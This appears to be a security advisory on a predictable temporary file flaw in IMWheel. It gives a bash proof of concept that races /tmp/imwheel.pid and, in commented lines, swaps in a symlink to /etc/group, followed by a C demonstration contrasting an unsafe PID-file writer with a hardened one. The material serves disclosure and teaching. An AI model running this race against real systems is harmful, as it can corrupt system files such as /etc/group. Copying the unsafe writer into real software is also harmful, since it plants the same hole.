IMWheel Predictable Temporary File Creation Vulnerability
No exploit is required. The following proof of concept is available:

#!/bin/bash
# You may have to adjust the number of characters in the print to
# get the timing correct for the injection. Fewer characters seem
# to prevent this from working. Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.
CHARCOUNT=4000

# Race imwheel for the predictable name /tmp/imwheel.pid: keep retrying
# until our write succeeds, so the file exists (owned by us) before imwheel
# opens it. CHARCOUNT is a shell variable, so it has to be expanded by the
# shell; the original single-quoted perl string left $CHARCOUNT undefined
# inside perl and printed nothing.
echo "$(perl -e "print '9' x $CHARCOUNT;")" > /tmp/imwheel.pid
while [[ $? != 0 ]]; do
    echo "$(perl -e "print '9' x $CHARCOUNT;")" > /tmp/imwheel.pid
done

# Wait for imwheel to write its PID to the new file.
sleep 1

# Wipe the contents of the PID file.
echo > /tmp/imwheel.pid

# Optionally, replace the new file with a link so that imwheel's write
# lands in a file it has permission for and we do not.
# rm /tmp/imwheel.pid
# ln -s /etc/group /tmp/imwheel.pid

echo "Exploit Successful!!!"
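The PoC works because the program opens a fixed, predictable name in a world-writable directory without checking what is already there, so a planted symlink redirects its write. The following is an added example, not code from this advisory or from IMWheel itself: it shows that unsafe PID-file idiom beside a hardened replacement, and replays the PoC's symlink variant against both. It assumes Linux or another POSIX system with a writable /tmp; the function names, the scratch directory and the "victim" file standing in for /etc/group are constructed for the demonstration.

```c
/* Added example (not IMWheel's code): unsafe vs. hardened PID-file creation.
 * Assumes POSIX with a writable /tmp; names and paths are illustrative. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: fopen(path, "w") follows a symlink that an attacker
 * planted at the predictable name and truncates whatever it points to. */
int pidfile_write_unsafe(const char *path, pid_t pid)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "%ld\n", (long)pid);
    return fclose(f);
}

/* Hardened pattern. O_CREAT|O_EXCL makes open() fail with EEXIST if anything,
 * a symlink included, already sits at path, so a successful open means the
 * file is ours. O_NOFOLLOW is defence in depth, and fstat() on the descriptor
 * (never stat() on the path, which could be swapped underneath us) confirms a
 * regular file with a single link. Returns 0 on success, -1 with errno set. */
int pidfile_write_safe(const char *path, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    if (write(fd, buf, (size_t)n) != n) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/* Reads the first line of a file into buf; returns 0 on success. */
static int read_first_line(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    int ok = fgets(buf, (int)n, f) != NULL;
    fclose(f);
    return ok ? 0 : -1;
}

/* Replays the PoC's symlink variant on a constructed layout: a scratch
 * directory, a "victim" file standing in for /etc/group, and a symlink at
 * the PID-file name pointing at it. Returns 1 when the unsafe writer
 * clobbered the victim, the safe writer refused the symlink, and the safe
 * writer still works on a name nobody pre-created; 0 otherwise. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/pidfile_demo_XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char victim[300], link[300], fresh[300], line[64], want[32];
    int clobbered = 0, refused = 0, works = 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/imwheel.pid", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.pid", dir);
    snprintf(want, sizeof want, "%ld\n", (long)getpid());

    FILE *v = fopen(victim, "w");
    if (v == NULL)
        goto cleanup;
    fputs("root:x:0:\n", v);            /* constructed stand-in for /etc/group */
    fclose(v);
    if (symlink(victim, link) < 0)
        goto cleanup;

    /* 1. The unsafe writer follows the link: victim now holds our PID. */
    clobbered = pidfile_write_unsafe(link, getpid()) == 0 &&
                read_first_line(victim, line, sizeof line) == 0 &&
                strcmp(line, want) == 0;
    /* 2. The safe writer sees the symlink as an existing entry and refuses. */
    refused = pidfile_write_safe(link, getpid()) < 0 &&
              (errno == EEXIST || errno == ELOOP);
    /* 3. On a name nobody pre-created, the safe writer behaves normally. */
    works = pidfile_write_safe(fresh, getpid()) == 0 &&
            read_first_line(fresh, line, sizeof line) == 0 &&
            strcmp(line, want) == 0;

cleanup:
    unlink(fresh);
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return clobbered && refused && works;
}

int main(void)
{
    puts(demo_symlink_attack() ? "unsafe writer followed the symlink; safe writer refused"
                               : "demo did not behave as expected");
    return 0;
}
```

The O_EXCL refusal is the property the PoC's "wait, then wipe or relink" step relies on being absent: a program that insists on creating the file itself, and gives up when it cannot, leaves the attacker nothing to pre-create. Keeping the PID file out of /tmp altogether (a directory only the daemon's user can write) removes the race rather than just detecting it.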